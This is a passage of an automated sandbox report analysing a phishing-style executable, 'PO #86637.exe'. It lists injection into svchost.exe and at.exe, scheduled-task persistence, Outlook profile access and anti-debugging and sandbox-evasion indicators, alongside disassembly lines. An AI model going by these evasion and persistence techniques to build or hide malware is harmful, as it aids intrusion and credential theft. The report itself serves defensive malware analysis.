            Source: C:\Windows\SysWOW64\at.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO #86637.exeStatic file information: File size 1373705 > 1048576
            Source: Binary string: at.pdb source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: yRUFfzlnDkMN.exe, 00000002.00000000.1759627743.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547128633.0000000000BFE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO #86637.exe, 00000000.00000003.1695463679.00000000046C0000.00000004.00001000.00020000.00000000.sdmp, PO #86637.exe, 00000000.00000003.1696781527.0000000004860000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1744447848.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1746074684.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845247076.0000000003400000.00000040.00001000.00020000.00000000.sdmp, at.exe, at.exe, 00000003.00000003.1845344566.0000000003732000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003C3E000.00000040.00001000.00020000.00000000.sdmp, at.exe, 00000003.00000003.1848717012.00000000038EF000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3548240590.0000000003AA0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: at.pdbGCTL source: svchost.exe, 00000001.00000003.1803876072.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1845110294.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000003.2248775259.000000000102B000.00000004.00000001.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000002.00000002.3547175896.0000000001017000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, at.exe, 00000003.00000002.3549391269.00000000040CC000.00000004.10000000.00040000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000000.1918974804.0000000002C4C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2246132315.00000000388EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: PO #86637.exeStatic PE information: real checksum: 0xa961f should be: 0x15c07e
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00462463 push edi; ret 0_2_00462465
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030B7 pushfd ; retf 1_2_004030B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00426973 push es; ret 1_2_00426986
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418110 push eax; iretd 1_2_00418114
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041411E push edi; ret 1_2_0041411F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411A74 pushad ; iretd 1_2_00411A84
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00414AB4 pushad ; retf 1_2_00414AB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403460 push eax; ret 1_2_00403462
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164EE push esp; ret 1_2_004164EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA225F pushad ; ret 3_2_03AA27F9
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA27FA pushad ; ret 3_2_03AA27F9
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AD09AD push ecx; mov dword ptr [esp], ecx3_2_03AD09B6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA283D push eax; iretd 3_2_03AA2858
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03AA1368 push eax; iretd 3_2_03AA1369
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0320E611 pushad ; iretd 3_2_0320E621
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03220AA5 push edx; retf 3_2_03220AA6
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03214CAD push eax; iretd 3_2_03214CB1
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321308B push esp; ret 3_2_0321308C
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03211651 pushad ; retf 3_2_03211652
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_03223510 push es; ret 3_2_03223523
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321BD2C push es; ret 3_2_0321BD32
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037D52B0 push ebp; iretd 3_2_037D52B2
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037D6115 push 5CC065C9h; retf 3_2_037D611A
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037D0BC6 push edx; iretd 3_2_037D0BC7
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DC9BF push ecx; retf 3_2_037DC9DE
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_037DCF00 push 0000003Ch; iretd 3_2_037DCF02

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exeProcess created: C:\Windows\SysWOW64\at.exe "C:\Windows\SysWOW64\at.exe"
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\PO #86637.exeAPI/Special instruction interceptor: Address: 40D228C
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\at.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\at.exeWindow / User API: threadDelayed 9838Jump to behavior
            Source: C:\Users\user\Desktop\PO #86637.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-85675
            Source: C:\Users\user\Desktop\PO #86637.exeAPI coverage: 3.3 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\at.exeAPI coverage: 2.7 %
            Source: C:\Windows\SysWOW64\at.exe TID: 4308Thread sleep count: 135 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 4308Thread sleep time: -270000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 4308Thread sleep count: 9838 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\at.exe TID: 4308Thread sleep time: -19676000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900Thread sleep time: -70000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe TID: 5900Thread sleep time: -34500s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\at.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\at.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321C390 FindFirstFileW,FindNextFileW,FindClose,3_2_0321C390
            Source: C:\Windows\SysWOW64\at.exeCode function: 3_2_0321C4C6 FindFirstFileW,FindNextFileW,FindClose,3_2_0321C4C6
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
            Source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547357398.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2247643841.00000206387CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PO #86637.exeAPI call chain: ExitProcess graph end nodegraph_0-84807
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\at.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417703 LdrLoadDll,1_2_00417703
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_040D24F8 mov eax, dword ptr fs:[00000030h]0_2_040D24F8
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_040D2558 mov eax, dword ptr fs:[00000030h]0_2_040D2558
            Source: C:\Users\user\Desktop\PO #86637.exeCode function: 0_2_040D0EC8 mov eax, dword ptr fs:[00000030h]0_2_040D0EC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h]1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h]1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350634F mov eax, dword ptr fs:[00000030h]1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D437C mov eax, dword ptr fs:[00000030h]1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h]1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h]1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h]1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03508324 mov eax, dword ptr fs:[00000030h]1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h]1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h]1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h]1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h]1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h]1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h]1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h]1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034663FF mov eax, dword ptr fs:[00000030h]1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h]1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345438F mov eax, dword ptr fs:[00000030h]1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428397 mov eax, dword ptr fs:[00000030h]1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h]1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350625D mov eax, dword ptr fs:[00000030h]1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h]1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436259 mov eax, dword ptr fs:[00000030h]1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h]1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434260 mov eax, dword ptr fs:[00000030h]1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342826B mov eax, dword ptr fs:[00000030h]1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h]1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342823B mov eax, dword ptr fs:[00000030h]1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
